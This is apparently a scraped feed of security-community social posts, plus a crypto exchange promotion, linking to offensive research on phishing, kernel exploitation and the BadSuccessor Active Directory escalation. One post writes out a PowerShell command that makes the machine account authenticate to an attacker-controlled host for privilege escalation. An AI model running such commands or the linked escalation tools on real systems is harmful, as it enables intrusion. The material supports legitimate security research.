🔥The 9th Round of Easy Loan, Earn $40 Reward is in progress❗️ ⏰ Promotion Period: January 15th - Feburary 15th, 2025 👉 Register now and check more details at gate.io/campaigns/358

Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ? Simply use: powershell iwr http://192.168.56.1 -UseDefaultCredentials To get an HTTP coerce of the machine account. 👇🧵

From classic HTML pages to advanced MFA bypasses, dive in with Atsika in an exploration of phishing techniques 🎣. Learn some infrastructure tricks and delivery methods to bypass common detection. 👉blog.quarkslab.com/technical-dive… (promise this one is legit 👀)

Abusing .pyc files matmul.is/$/pyc.html

Linux Kernel Exploitation series Awesome series of articles by r1ru that outlines many commonly-used modern exploitation techniques. r1ru.github.io/categories/lin…

For anyone that wasn't able to go to CactusCon but wanted to see my talk. Here it is youtu.be/88vwMqZzTgQ?si… TrustedSec #hacktheplanet

Enjoy github.com/Octoberfest7/z…

We are very excited to announce that Volatility 3 has reached parity with Volatility 2! With this achievement, Volatility 2 is now deprecated. See the full details in our blog post: volatilityfoundation.org/announcing-the…

PowerShell's Test-NetConnection is too slow, so I wrote a simple function to check if specific TCP ports are opened quickly without ping. Would be helpful TCP port sweeping. gist.github.com/daem0nc0re/1ec…

Thanks to the awesome work of Aleem Ladha , the CTF Windows Active Directory lab for Barbhack from 2024 is now public! 🔥 You can build the lab and pwn the AD—13 flags to capture! No public write-up exists yet—waiting for someone to submit one! github.com/Pennyw0rth/Net…

a certain certification vendor must be fuming right now

Decided to dive into the internals of Volume Shadow Copy (VSS). If you're curious about how the different VSS components work together, check this out: medium.com/@Debugger/insi…

We played Midnight Sun CTF Quals this weekend with r3kapig and secured 3rd place with a full solve! Look forward to meeting all finalists in 🇸🇪 Stockholm this June :)

Microsoft Deployment Toolkit (MDT) is often overlooked but shares are a goldmine of valuable info for red teamers. In our latest blog, Oddvar Moe walks through how to set up MDT and best practices for managing and protecting credentials. Read it now! trustedsec.com/blog/red-team-…

🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it 🤷‍♂️ Read Here - akamai.com/blog/security-…

🔥🔥🔥Write-up - Challenge active directory by KlemouLeZoZo ➡️ acceis.fr/write-up-barbh… #barbhack24 road to 25 💪

Took Akamai Security Intelligence Group's script for BadSuccessor and improved it a bit. - runs from non domain joined systems - works in forests - prints the rights each entity has on a OU - pre-flight check if 2025 DCs are present - code changes here and there github.com/LuemmelSec/Pen…

BadSuccessor in python with bloodyAD Have fun :D linkedin.com/feed/update/ur…

Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥 github.com/Pennyw0rth/Net…

I'm super happy to announce an operationally weaponized version of Yuval Gordon's BadSuccessor in .NET format! With a minimum of "CreateChild" privileges over any OU it allows for automatic escalation to Domain Admin (DA). Enjoy your inline .NET execution! github.com/logangoins/Sha…

Friend recently used this trick posted by Mayfly x.com/M4yFly/status/… to pop a MSSQL box on a non-evasive using xp_cmdshell since EDR was being annoying. It made me curious if there were other ways to trigger HTTP auth for priv esc.